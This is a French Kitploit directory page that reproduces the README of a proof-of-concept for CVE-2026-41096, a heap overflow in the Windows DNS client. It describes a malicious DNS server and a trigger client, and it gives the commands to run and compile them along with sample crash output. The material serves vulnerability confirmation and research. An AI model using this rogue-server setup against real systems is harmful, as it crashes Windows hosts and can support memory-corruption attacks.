Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41096 — Exploit de preuve de concept pour CVE-2026-41096 : débordement de tas dans DnsRawTruncateMessageForUdp() du client DNS Windows. Comprend un serveur DNS malveillant et un client déclencheur pour confirmer la vulnérabilité. | Kitploit
Outils/GitHubGitHub/m0n1x90/cve-2026-41096
Génération de PayloadsAnalyse des VulnérabilitésExploitationFuzzingAnalyse DNSExploitation de Binaires
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

Exploit de preuve de concept pour CVE-2026-41096 : débordement de tas dans DnsRawTruncateMessageForUdp() du client DNS Windows. Comprend un serveur DNS malveillant et un client déclencheur pour confirmer la vulnérabilité.

Voir le dépôt
3216il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41096 - Preuve de concept de crash

Débordement de tas dans DnsRawTruncateMessageForUdp() (dnsapi.dll). Une réponse DNS malveillante avec QDCOUNT=0 et un enregistrement OPT volumineux provoque un débordement de tas de 604 octets lorsque la logique de troncature calcule mal le pointeur de destination.

Avis MSRC : https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

Composants

FichierDescription
rogue_dns_server.pyServeur DNS malveillant (Python 3). Répond à chaque requête avec une réponse QDCOUNT=0 + OPT (623 octets).
trigger_client.cClient déclencheur (C/Win32). Appelle DnsQueryRaw pointé vers le serveur malveillant. Capture le crash via SetUnhandledExceptionFilter.

Prérequis

Attaquant (serveur malveillant) :

  • Python 3
  • Root/administrateur (port 53)

Victime (client déclencheur) :

  • Système d'exploitation Windows avec le service DnsCache (nécessite DnsQueryRaw)
  • Version vulnérable de dnsapi.dll
  • Visual Studio / Windows SDK (pour compiler)

Utilisation

1. Démarrer le serveur malveillant :

sudo python3 rogue_dns_server.py

2. Compiler et exécuter le client déclencheur :

cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (Optionnel) Activer Page Heap pour un crash déterministe :

gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

Codes de sortie

CodeSignification
0Le système est patché (DNS_ERROR_BAD_PACKET retourné proprement)
1Erreur (DnsQueryRaw introuvable, problème réseau, etc.)
2Crash détecté (débordement de tas confirmé)

Exemple de sortie

Vulnérable (Page Heap) :

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Vulnérable (sans Page Heap) :

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

Patché :

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
Télécharger l’outil